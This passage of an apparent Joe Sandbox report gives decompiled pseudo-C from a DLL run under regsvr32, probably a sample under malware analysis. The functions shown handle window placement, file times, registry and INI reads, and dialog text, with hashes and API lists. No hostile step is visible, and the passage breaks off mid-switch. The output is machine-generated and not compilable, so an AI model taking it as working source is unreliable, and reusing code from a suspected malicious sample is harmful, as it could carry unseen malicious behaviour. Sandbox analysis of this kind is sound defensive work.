                                                                                                                				_t126 = __ecx;
                                                                                                                				_t158 = _t161;
                                                                                                                				_t154 = __ecx;
                                                                                                                				_t63 =  *((intOrPtr*)(__ecx + 4));
                                                                                                                				_push(_t147);
                                                                                                                				if(_t63 != 0) {
                                                                                                                					_t64 =  *(_t63 + 0x28);
                                                                                                                					__eflags = _t64;
                                                                                                                					if(_t64 == 0) {
                                                                                                                						goto L4;
                                                                                                                					} else {
                                                                                                                						_t126 = _t64;
                                                                                                                						_t72 = E10015912(0, _t126, _t147);
                                                                                                                						__eflags = _t72;
                                                                                                                						_v8 = _t72;
                                                                                                                						if(_t72 == 0) {
                                                                                                                							goto L4;
                                                                                                                						} else {
                                                                                                                							_t73 = IsWindowVisible( *(_t72 + 0x20));
                                                                                                                							asm("sbb eax, eax");
                                                                                                                							_t75 =  ~_t73 + 1;
                                                                                                                							__eflags = _t75;
                                                                                                                							_v24 = _t75;
                                                                                                                							if(_t75 != 0) {
                                                                                                                								GetWindowRect( *(E10013FEA(0, _t126, _t158, GetDesktopWindow()) + 0x20),  &_v56);
                                                                                                                								GetWindowRect( *(_v8 + 0x20),  &_v40);
                                                                                                                								asm("cdq");
                                                                                                                								asm("cdq");
                                                                                                                								__eflags = _v56.right - _v56.left - _t144;
                                                                                                                								E100178FF(_v8, _v56.right - _v56.left - _t144 >> 1, _v56.bottom - _v56.top - _t144 >> 1, 0, 0, 0);
                                                                                                                								E1001793D(_v8, 1);
                                                                                                                							}
                                                                                                                							_t77 =  *((intOrPtr*)( *((intOrPtr*)(_t154 + 4)) + 0x50));
                                                                                                                							_t148 = _t154 + 0x48;
                                                                                                                							_t78 =  *((intOrPtr*)( *_t77))(_t77, 0x1009df80, _t148);
                                                                                                                							__eflags = _t78;
                                                                                                                							if(_t78 < 0) {
                                                                                                                								_t80 =  *((intOrPtr*)( *((intOrPtr*)(_t154 + 4)) + 0x50));
                                                                                                                								_t81 =  *((intOrPtr*)( *_t80))(_t80, 0x1009dfd8,  &_v16);
                                                                                                                								__eflags = _t81;
                                                                                                                								if(_t81 >= 0) {
                                                                                                                									_t82 = _v16;
                                                                                                                									 *((intOrPtr*)( *_t82 + 0x14))(_t82,  &_v20);
                                                                                                                									_t84 = _v16;
                                                                                                                									 *((intOrPtr*)( *_t84 + 8))(_t84);
                                                                                                                									_t86 = _v20;
                                                                                                                									__eflags = _t86;
                                                                                                                									if(_t86 != 0) {
                                                                                                                										_t150 = _t154 + 8;
                                                                                                                										_v12 =  *((intOrPtr*)( *_t86))(_t86, 0x100a428c, _t150);
                                                                                                                										_t88 = _v20;
                                                                                                                										 *((intOrPtr*)( *_t88 + 8))(_t88);
                                                                                                                										_t81 = _v12;
                                                                                                                										__eflags = _t81;
                                                                                                                										if(__eflags >= 0) {
                                                                                                                											_t151 =  *_t150;
                                                                                                                											 *( *_t151)(_t151, 0x100a426c, _t154 + 0xc);
                                                                                                                											goto L21;
                                                                                                                										}
                                                                                                                									} else {
                                                                                                                										_t81 = 0x80004005;
                                                                                                                									}
                                                                                                                								}
                                                                                                                							} else {
                                                                                                                								_t99 =  *_t148;
                                                                                                                								_t151 = _t154 + 0x4c;
                                                                                                                								_t100 =  *((intOrPtr*)( *_t99 + 0xc))(_t99, 0, 0x100a61dc, _t151);
                                                                                                                								__eflags =  *_t151;
                                                                                                                								_v12 = _t100;
                                                                                                                								if( *_t151 == 0) {
                                                                                                                									_v12 = 0x80004003;
                                                                                                                								}
                                                                                                                								__eflags = _v12;
                                                                                                                								if(__eflags >= 0) {
                                                                                                                									L21:
                                                                                                                									_t92 = E10031021(0, _t154, _t151, _t154, __eflags);
                                                                                                                									__eflags = _v24;
                                                                                                                									_t156 = _t92;
                                                                                                                									if(_v24 != 0) {
                                                                                                                										__eflags = _v40.right - _v40.left;
                                                                                                                										E100178FF(_v8, _v40.left, _v40.top, _v40.right - _v40.left, _v40.bottom - _v40.top, 0);
                                                                                                                										E1001793D(_v8, 0);
                                                                                                                									}
                                                                                                                									_t81 = _t156;
                                                                                                                								} else {
                                                                                                                									__eflags = _v24;
                                                                                                                									if(_v24 != 0) {
                                                                                                                										__eflags = _v40.right - _v40.left;
                                                                                                                										E100178FF(_v8, _v40.left, _v40.top, _v40.right - _v40.left, _v40.bottom - _v40.top, 0);
                                                                                                                										E1001793D(_v8, 0);
                                                                                                                									}
                                                                                                                									_t81 = _v12;
                                                                                                                								}
                                                                                                                							}
                                                                                                                							return _t81;
                                                                                                                						}
                                                                                                                					}
                                                                                                                				} else {
                                                                                                                					L4:
                                                                                                                					_push(_t158);
                                                                                                                					_push(_t126);
                                                                                                                					_v76 = 0x100b8618;
                                                                                                                					L10048E48( &_v76, 0x100aff30);
                                                                                                                					asm("int3");
                                                                                                                					_push(4);
                                                                                                                					E1004764D(0x1008dd26, 0, _t147, _t154);
                                                                                                                					_t127 = E10020454(0x104);
                                                                                                                					_v88 = _t127;
                                                                                                                					_t70 = 0;
                                                                                                                					_v76 = 0;
                                                                                                                					if(_t127 != 0) {
                                                                                                                						_t70 = E1001DB72(_t127);
                                                                                                                					}
                                                                                                                					return E10047725(_t70);
                                                                                                                				}
                                                                                                                			}













































                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$Rect$DesktopVisible
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E1003926B(void* __ecx, void* __eflags, signed int* _a4) {
                                                                                                                				char _v12;
                                                                                                                				struct _FILETIME _v20;
                                                                                                                				struct _FILETIME _v28;
                                                                                                                				char _v36;
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				void* __ebp;
                                                                                                                				void* _t52;
                                                                                                                				long _t56;
                                                                                                                				signed int* _t75;
                                                                                                                				signed int* _t78;
                                                                                                                				signed int* _t81;
                                                                                                                				struct _FILETIME* _t88;
                                                                                                                				void* _t100;
                                                                                                                				CHAR* _t101;
                                                                                                                				signed int* _t102;
                                                                                                                				void* _t103;
                                                                                                                				void* _t107;
                                                                                                                
                                                                                                                				_t85 = __ecx;
                                                                                                                				_t102 = _a4;
                                                                                                                				_t100 = __ecx;
                                                                                                                				E10049170(__ecx, _t102, 0, 0x128);
                                                                                                                				E1000A0B7(0, _t85, _t100, _t102, _t103,  &(_t102[8]), 0x104,  *(_t100 + 0xc), 0xffffffff);
                                                                                                                				_t52 =  *(_t100 + 4);
                                                                                                                				_t107 = _t52 -  *0x1009db74; // 0xffffffff
                                                                                                                				if(_t107 == 0) {
                                                                                                                					L21:
                                                                                                                					return 1;
                                                                                                                				}
                                                                                                                				_t88 =  &_v12;
                                                                                                                				if(GetFileTime(_t52, _t88,  &_v20,  &_v28) != 0) {
                                                                                                                					_t56 = GetFileSize( *(_t100 + 4), 0);
                                                                                                                					_t102[6] = _t56;
                                                                                                                					_t102[7] = 0;
                                                                                                                					if(_t56 != 0xffffffff || 0 != 0) {
                                                                                                                						_t101 =  *(_t100 + 0xc);
                                                                                                                						if( *((intOrPtr*)(_t101 - 0xc)) != 0) {
                                                                                                                							_t102[8] = (_t88 & 0xffffff00 | GetFileAttributesA(_t101) == 0xffffffff) - 0x00000001 & _t57;
                                                                                                                						} else {
                                                                                                                							_t102[8] = 0;
                                                                                                                						}
                                                                                                                						if(E10038C62( &_v12) == 0) {
                                                                                                                							 *_t102 = 0;
                                                                                                                							_t102[1] = 0;
                                                                                                                						} else {
                                                                                                                							_t81 = L10038D98(0,  &_v36, _t101,  &_v12, 0xffffffff);
                                                                                                                							 *_t102 =  *_t81;
                                                                                                                							_t102[1] = _t81[1];
                                                                                                                						}
                                                                                                                						if(E10038C62( &_v20) == 0) {
                                                                                                                							_t102[4] = 0;
                                                                                                                							_t102[5] = 0;
                                                                                                                						} else {
                                                                                                                							_t78 = L10038D98(0,  &_v36, _t101,  &_v20, 0xffffffff);
                                                                                                                							_t102[4] =  *_t78;
                                                                                                                							_t102[5] = _t78[1];
                                                                                                                						}
                                                                                                                						if(E10038C62( &_v28) == 0) {
                                                                                                                							_t102[2] = 0;
                                                                                                                							_t102[3] = 0;
                                                                                                                						} else {
                                                                                                                							_t75 = L10038D98(0,  &_v36, _t101,  &_v28, 0xffffffff);
                                                                                                                							_t102[2] =  *_t75;
                                                                                                                							_t102[3] = _t75[1];
                                                                                                                						}
                                                                                                                						if(( *_t102 | _t102[1]) == 0) {
                                                                                                                							 *_t102 = _t102[2];
                                                                                                                							_t102[1] = _t102[3];
                                                                                                                						}
                                                                                                                						if((_t102[4] | _t102[5]) == 0) {
                                                                                                                							_t102[4] = _t102[2];
                                                                                                                							_t102[5] = _t102[3];
                                                                                                                						}
                                                                                                                						goto L21;
                                                                                                                					} else {
                                                                                                                						goto L2;
                                                                                                                					}
                                                                                                                				}
                                                                                                                				L2:
                                                                                                                				return 0;
                                                                                                                			}

                                                                                                                0x1003937f
                                                                                                                0x10039385
                                                                                                                0x10039385
                                                                                                                0x10039399
                                                                                                                0x1003939e
                                                                                                                0x100393a3
                                                                                                                0x100393a3
                                                                                                                0x100393ac
                                                                                                                0x100393b1
                                                                                                                0x100393b7
                                                                                                                0x100393b7
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100392dd
                                                                                                                0x100392c3
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                • _memset.LIBCMT ref: 10039282
                                                                                                                  • Part of subcall function 1000A0B7: _wctomb_s.LIBCMT ref: 1000A0C7
                                                                                                                • GetFileTime.KERNEL32(?,?,?,?), ref: 100392B9
                                                                                                                • GetFileSize.KERNEL32(?,00000000), ref: 100392CE
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$SizeTime_memset_wctomb_s
                                                                                                                • String ID:
                                                                                                                • API String ID: 26245289-0
                                                                                                                • Opcode ID: 9e23e771f43b21b5225b5bbeaec31b18534d685dfb75f694ddad4e772cd0be0e
                                                                                                                • Instruction ID: 395707f0aedb694bf18453a667929c4cad6f780381ae80af0bd1f268e73cf5ff
                                                                                                                • Opcode Fuzzy Hash: 9e23e771f43b21b5225b5bbeaec31b18534d685dfb75f694ddad4e772cd0be0e
                                                                                                                • Instruction Fuzzy Hash: 4C411AB5500705AFC725DF68C981C9AB7F8FF09351B108A6EE5A6D7690E730FA44CB60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 73%
                                                                                                                			E10037302(void* __ebx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                				void* __ebp;
                                                                                                                				signed int _t36;
                                                                                                                				intOrPtr _t40;
                                                                                                                				struct HWND__* _t44;
                                                                                                                				signed int _t47;
                                                                                                                				short* _t52;
                                                                                                                				intOrPtr _t65;
                                                                                                                				struct HWND__* _t70;
                                                                                                                				intOrPtr _t79;
                                                                                                                				short* _t82;
                                                                                                                				intOrPtr _t83;
                                                                                                                				struct HWND__** _t85;
                                                                                                                				intOrPtr _t86;
                                                                                                                				signed int _t87;
                                                                                                                				void* _t89;
                                                                                                                				struct HWND__** _t94;
                                                                                                                				intOrPtr _t96;
                                                                                                                
                                                                                                                				_t80 = __edi;
                                                                                                                				_t79 = __edx;
                                                                                                                				_t87 = _t89 - 0xfc;
                                                                                                                				_t36 =  *0x100b9e70; // 0xbb35530
                                                                                                                				 *(_t87 + 0x100) = _t36 ^ _t87;
                                                                                                                				_push(0xc);
                                                                                                                				E1004764D(0x10090b14, __ebx, __edi, __esi);
                                                                                                                				_t85 =  *(_t87 + 0x110);
                                                                                                                				_t40 =  *((intOrPtr*)(_t87 + 0x114));
                                                                                                                				_t94 = _t85;
                                                                                                                				_t67 = 0 | _t94 != 0x00000000;
                                                                                                                				 *((intOrPtr*)(_t87 - 0x18)) = _t40;
                                                                                                                				_t95 = _t94 != 0;
                                                                                                                				if(_t94 != 0) {
                                                                                                                					L2:
                                                                                                                					_t96 = _t40;
                                                                                                                					_t67 = 0 | _t96 != 0x00000000;
                                                                                                                					if(_t96 != 0) {
                                                                                                                						goto L1;
                                                                                                                					}
                                                                                                                					L1000140B(_t87 - 0x10, E100184C0());
                                                                                                                					_t44 = _t85[2];
                                                                                                                					_t70 = _t85[1];
                                                                                                                					 *((intOrPtr*)(_t87 - 4)) = 0;
                                                                                                                					if(_t44 != 0xfffffdf8 || (_t85[0x19] & 0x00000001) == 0) {
                                                                                                                						if(_t44 != 0xfffffdee || (_t85[0x2d] & 0x00000001) == 0) {
                                                                                                                							goto L8;
                                                                                                                						} else {
                                                                                                                							goto L7;
                                                                                                                						}
                                                                                                                					} else {
                                                                                                                						L7:
                                                                                                                						_t70 = GetDlgCtrlID(_t70) & 0x0000ffff;
                                                                                                                						L8:
                                                                                                                						if(_t70 == 0) {
                                                                                                                							L12:
                                                                                                                							__eflags = _t85[2] - 0xfffffdf8;
                                                                                                                							if(_t85[2] != 0xfffffdf8) {
                                                                                                                								 *(_t87 - 0x14) =  *(_t87 - 0x10);
                                                                                                                								_t82 =  &(_t85[4]);
                                                                                                                								_t47 = MultiByteToWideChar( *0x100bb480(), 0,  *(_t87 - 0x14), 0xffffffff, _t82, 0x50);
                                                                                                                								__eflags = _t82;
                                                                                                                								if(_t82 != 0) {
                                                                                                                									__eflags = _t47 - 0x50;
                                                                                                                									if(_t47 > 0x50) {
                                                                                                                										_push(0x80004005);
                                                                                                                										_t47 = L10001401(0, _t70, _t79, _t82, _t85, _t87);
                                                                                                                									}
                                                                                                                								}
                                                                                                                								__eflags = _t47;
                                                                                                                								if(_t47 > 0) {
                                                                                                                									__eflags = _t82;
                                                                                                                									if(_t82 != 0) {
                                                                                                                										 *((short*)(_t82 + _t47 * 2 - 2)) = 0;
                                                                                                                									}
                                                                                                                								}
                                                                                                                							} else {
                                                                                                                								L10034FCA(0, _t79, 0xfffffdf8, _t85, _t87,  &(_t85[4]), 0x50,  *(_t87 - 0x10), 0xffffffff);
                                                                                                                							}
                                                                                                                							 *((intOrPtr*)( *((intOrPtr*)(_t87 - 0x18)))) = 0;
                                                                                                                							SetWindowPos( *_t85, 0, 0, 0, 0, 0, 0x213);
                                                                                                                							L100013E3( &(( *(_t87 - 0x10))[0xfffffffffffffff0]), _t79);
                                                                                                                							_t52 = 1;
                                                                                                                							__eflags = 1;
                                                                                                                							L21:
                                                                                                                							 *[fs:0x0] =  *((intOrPtr*)(_t87 - 0xc));
                                                                                                                							_pop(_t83);
                                                                                                                							_pop(_t86);
                                                                                                                							_pop(_t65);
                                                                                                                							return E1004763E(_t52, _t65,  *(_t87 + 0x100) ^ _t87, _t79, _t83, _t86);
                                                                                                                						}
                                                                                                                						if(E1001FA58(0, _t70, 0xfffffdf8, _t85, _t87, _t70, _t87, 0x100) != 0) {
                                                                                                                							E1001FB1B(_t87 - 0x10, _t87, 1, 0xa);
                                                                                                                							goto L12;
                                                                                                                						} else {
                                                                                                                							L100013E3( &(( *(_t87 - 0x10))[0xfffffffffffffff0]), _t79);
                                                                                                                							_t52 = 0;
                                                                                                                							goto L21;
                                                                                                                						}
                                                                                                                					}
                                                                                                                				}
                                                                                                                				L1:
                                                                                                                				_t40 = E1000A069(0, _t67, _t80, _t85, _t95);
                                                                                                                				goto L2;
                                                                                                                			}




















                                                                                                                0x10037372
                                                                                                                0x10037342
                                                                                                                0x10037342
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 10037321
                                                                                                                • GetDlgCtrlID.USER32 ref: 1003738B
                                                                                                                  • Part of subcall function 1000A069: __CxxThrowException@8.LIBCMT ref: 1000A07D
                                                                                                                  • Part of subcall function 1000A069: __EH_prolog3.LIBCMT ref: 1000A08A
                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000050), ref: 10037401
                                                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000213), ref: 10037438
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog3$ByteCharCtrlException@8MultiThrowWideWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 1663627363-0
                                                                                                                • Opcode ID: ca537a2ef50836b29fd132a96b3a6a5ddde4d58cda0944cf2b2cdc7173693b47
                                                                                                                • Instruction ID: cde7b1fb930a4334c8d67137af01b601bac6e602a68672dd04c8859f716bedd0
                                                                                                                • Opcode Fuzzy Hash: ca537a2ef50836b29fd132a96b3a6a5ddde4d58cda0944cf2b2cdc7173693b47
                                                                                                                • Instruction Fuzzy Hash: 9941C175A0024A9FDB26DFA4CCC1BEE77E4FF04351F110A2DFA66DA2D0D770A9408A51
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 75%
                                                                                                                			E100261FC(void* __ecx) {
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				void* __ebp;
                                                                                                                				signed int _t44;
                                                                                                                				char _t45;
                                                                                                                				CHAR* _t47;
                                                                                                                				char _t51;
                                                                                                                				void* _t53;
                                                                                                                				long _t58;
                                                                                                                				char* _t69;
                                                                                                                				intOrPtr _t70;
                                                                                                                				char _t79;
                                                                                                                				CHAR* _t85;
                                                                                                                				char _t87;
                                                                                                                				intOrPtr _t88;
                                                                                                                				void* _t89;
                                                                                                                				intOrPtr _t92;
                                                                                                                				CHAR* _t93;
                                                                                                                				void* _t95;
                                                                                                                
                                                                                                                				_t71 = __ecx;
                                                                                                                				_t93 = _t95 - 0x1004;
                                                                                                                				L1004CF80(0x1004);
                                                                                                                				_push(0xffffffff);
                                                                                                                				_push(0x1008fae2);
                                                                                                                				_push( *[fs:0x0]);
                                                                                                                				_t44 =  *0x100b9e70; // 0xbb35530
                                                                                                                				_t45 = _t44 ^ _t93;
                                                                                                                				_t93[0x1000] = _t45;
                                                                                                                				_push(_t45);
                                                                                                                				 *[fs:0x0] = _t93 - 0xc;
                                                                                                                				_t87 = _t93[0x100c];
                                                                                                                				_t85 = _t93[0x1018];
                                                                                                                				_t47 = _t93[0x1010];
                                                                                                                				_t69 = _t93[0x1014];
                                                                                                                				 *(_t93 - 0x14) = _t87;
                                                                                                                				 *(_t93 - 0x18) = _t85;
                                                                                                                				 *(_t93 - 0x20) = 0;
                                                                                                                				if( *((intOrPtr*)(__ecx + 0x54)) == 0) {
                                                                                                                					__eflags = _t85;
                                                                                                                					if(__eflags == 0) {
                                                                                                                						 *(_t93 - 0x18) = 0x1009c448;
                                                                                                                					}
                                                                                                                					GetPrivateProfileStringA(_t47, _t69,  *(_t93 - 0x18), _t93, 0x1000,  *(_t71 + 0x68));
                                                                                                                					_push(_t93);
                                                                                                                					goto L12;
                                                                                                                				} else {
                                                                                                                					_t53 = E10025F4C(__ecx, _t47);
                                                                                                                					_t99 = _t53;
                                                                                                                					 *(_t93 - 0x24) = _t53;
                                                                                                                					if(_t53 != 0) {
                                                                                                                						L1000140B(_t93 - 0x10, E100184C0());
                                                                                                                						_t89 = RegQueryValueExA;
                                                                                                                						 *((intOrPtr*)(_t93 - 4)) = 0;
                                                                                                                						 *(_t93 - 0x28) = 0;
                                                                                                                						 *(_t93 - 0x1c) = 0;
                                                                                                                						_t58 = RegQueryValueExA( *(_t93 - 0x24), _t69, 0, _t93 - 0x28, 0, _t93 - 0x1c);
                                                                                                                						__eflags = _t58;
                                                                                                                						 *(_t93 - 0x20) = _t58;
                                                                                                                						if(_t58 == 0) {
                                                                                                                							 *(_t93 - 0x20) = RegQueryValueExA( *(_t93 - 0x24), _t69, 0, _t93 - 0x28, L100011F4(_t93 - 0x10,  *(_t93 - 0x1c)), _t93 - 0x1c);
                                                                                                                							E1000FED3(_t93 - 0x10, 0xffffffff);
                                                                                                                						}
                                                                                                                						RegCloseKey( *(_t93 - 0x24));
                                                                                                                						__eflags =  *(_t93 - 0x20);
                                                                                                                						_t79 =  *(_t93 - 0x14);
                                                                                                                						if(__eflags != 0) {
                                                                                                                							_push( *(_t93 - 0x18));
                                                                                                                							E1000B543(_t69, _t79, _t89, 0, __eflags);
                                                                                                                						} else {
                                                                                                                							L100010F5(_t79, __eflags, _t93 - 0x10);
                                                                                                                						}
                                                                                                                						L100013E3( *((intOrPtr*)(_t93 - 0x10)) + 0xfffffff0, _t85);
                                                                                                                						_t51 =  *(_t93 - 0x14);
                                                                                                                					} else {
                                                                                                                						_push( *(_t93 - 0x18));
                                                                                                                						L12:
                                                                                                                						E1000B543(_t69, _t87, _t87, 0, _t99);
                                                                                                                						_t51 = _t87;
                                                                                                                					}
                                                                                                                				}
                                                                                                                				 *[fs:0x0] =  *((intOrPtr*)(_t93 - 0xc));
                                                                                                                				_pop(_t88);
                                                                                                                				_pop(_t92);
                                                                                                                				_pop(_t70);
                                                                                                                				return E1004763E(_t51, _t70, _t93[0x1000] ^ _t93, _t85, _t88, _t92);
                                                                                                                			}
























                                                                                                                APIs
                                                                                                                • RegQueryValueExA.ADVAPI32 ref: 100262A5
                                                                                                                • RegQueryValueExA.ADVAPI32 ref: 100262C7
                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 100262D9
                                                                                                                • GetPrivateProfileStringA.KERNEL32(?,?,?,?,00001000,?), ref: 10026326
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: QueryValue$ClosePrivateProfileString
                                                                                                                • String ID:
                                                                                                                • API String ID: 1042844925-0
                                                                                                                • Opcode ID: 7e5ca71659264342a84135f862c441e723376347e8cb3eec01237bd20aa3d418
                                                                                                                • Instruction ID: 60872dfbbed3684bb72bca17b6318999f261628bc760fed0f36e50853fce30c9
                                                                                                                • Opcode Fuzzy Hash: 7e5ca71659264342a84135f862c441e723376347e8cb3eec01237bd20aa3d418
                                                                                                                • Instruction Fuzzy Hash: D2414AB5D00199AFDF21DFA4CC81AEEBBB9FF08354F10016AF515A3290D7746A45CBA4
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 61%
                                                                                                                			E10039799(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                				signed int _t51;
                                                                                                                				signed int _t53;
                                                                                                                				signed int* _t54;
                                                                                                                				signed int _t56;
                                                                                                                				intOrPtr _t63;
                                                                                                                				intOrPtr* _t69;
                                                                                                                				char* _t74;
                                                                                                                				void* _t76;
                                                                                                                
                                                                                                                				_push(0x20);
                                                                                                                				E1004764D(0x10090e9b, __ebx, __edi, __esi);
                                                                                                                				 *((intOrPtr*)(_t76 - 0x14)) = __ecx;
                                                                                                                				 *(_t76 - 0x10) = 0;
                                                                                                                				E100235FF(_t76 - 0x2c);
                                                                                                                				_t63 =  *((intOrPtr*)(_t76 + 8));
                                                                                                                				_t69 =  *((intOrPtr*)( *((intOrPtr*)(_t76 + 0xc))));
                                                                                                                				_t51 =  *(_t63 + 0xc) & 0x0000ffff;
                                                                                                                				if(_t51 == 0xc ||  *_t69 == _t51) {
                                                                                                                					L5:
                                                                                                                					_t74 =  *((intOrPtr*)(_t63 + 0x18)) +  *((intOrPtr*)(_t76 - 0x14));
                                                                                                                					_t53 = ( *(_t63 + 0xc) & 0x0000ffff) + 0xfffffffe;
                                                                                                                					__eflags = _t53 - 0x13;
                                                                                                                					if(_t53 > 0x13) {
                                                                                                                						L21:
                                                                                                                						 *(_t76 - 0x10) = 0x80020008;
                                                                                                                						L22:
                                                                                                                						_t54 =  *(_t76 + 0x10);
                                                                                                                						 *_t54 =  *_t54 & 0x00000000;
                                                                                                                						__eflags =  *_t54;
                                                                                                                						L23:
                                                                                                                						__imp__#9(_t76 - 0x2c);
                                                                                                                						__eflags =  *(_t76 - 0x10);
                                                                                                                						if( *(_t76 - 0x10) >= 0) {
                                                                                                                							__eflags =  *(_t63 + 0x14);
                                                                                                                							if(__eflags != 0) {
                                                                                                                								E1001E397(_t76 - 0x1c, __eflags,  *((intOrPtr*)( *((intOrPtr*)(_t76 - 0x14)) + 0x1c)));
                                                                                                                								 *(_t76 - 4) = 0;
                                                                                                                								 *(_t63 + 0x14)();
                                                                                                                								 *(_t76 - 4) =  *(_t76 - 4) | 0xffffffff;
                                                                                                                								__eflags =  *(_t76 - 0x18);
                                                                                                                								if( *(_t76 - 0x18) != 0) {
                                                                                                                									_push( *((intOrPtr*)(_t76 - 0x1c)));
                                                                                                                									_push(0);
                                                                                                                									E1001D714();
                                                                                                                								}
                                                                                                                							}
                                                                                                                						}
                                                                                                                						_t56 =  *(_t76 - 0x10);
                                                                                                                						goto L28;
                                                                                                                					}
                                                                                                                					switch( *((intOrPtr*)(_t53 * 4 +  &M100398CD))) {
                                                                                                                						case 0:
                                                                                                                							__ax =  *(__edi + 8);
                                                                                                                							 *__esi =  *(__edi + 8);
                                                                                                                							goto L23;
                                                                                                                						case 1:
                                                                                                                							L9:
                                                                                                                							__eax =  *(__edi + 8);
                                                                                                                							goto L10;
                                                                                                                						case 2:
                                                                                                                							 *__esi =  *(__edi + 8);
                                                                                                                							goto L23;
                                                                                                                						case 3:
                                                                                                                							 *__esi =  *(__edi + 8);
                                                                                                                							goto L23;
                                                                                                                						case 4:
                                                                                                                							__eax =  *(__edi + 8);
                                                                                                                							 *__esi =  *(__edi + 8);
                                                                                                                							__eax =  *(__edi + 0xc);
                                                                                                                							__esi[1] = __eax;
                                                                                                                							goto L23;
                                                                                                                						case 5:
